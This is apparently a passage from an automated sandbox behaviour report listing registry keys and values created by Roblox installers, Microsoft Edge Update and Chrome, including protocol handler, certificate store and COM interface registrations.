Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio-auth C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio-auth\WarnOnOpen = "0" C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0" C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0" C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0" C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0" C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX-STUDIO C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639185514937027" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass\CurVer\ = "MicrosoftEdgeUpdate.CoreMachineClass.1" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\VersionIndependentProgID C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods\ = "23" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ = "IPolicyStatus" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ = "IGoogleUpdate3" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ = "IGoogleUpdateCore" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ = "IPolicyStatus" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA}\InprocHandler32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachine.1.0" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837} C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\ProgID C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ProxyStubClsid32\ = "{0DD41A78-E3D4-44A8-9EAE-697BCF1781A3}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E} C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ = "IPolicyStatus5" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ = "IAppVersion" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ = "IAppWeb" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods\ = "41" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F} C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService.1.0\CLSID C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods\ = "17" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\Elevation C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods\ = "4" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2} C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6b33415f21c8da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
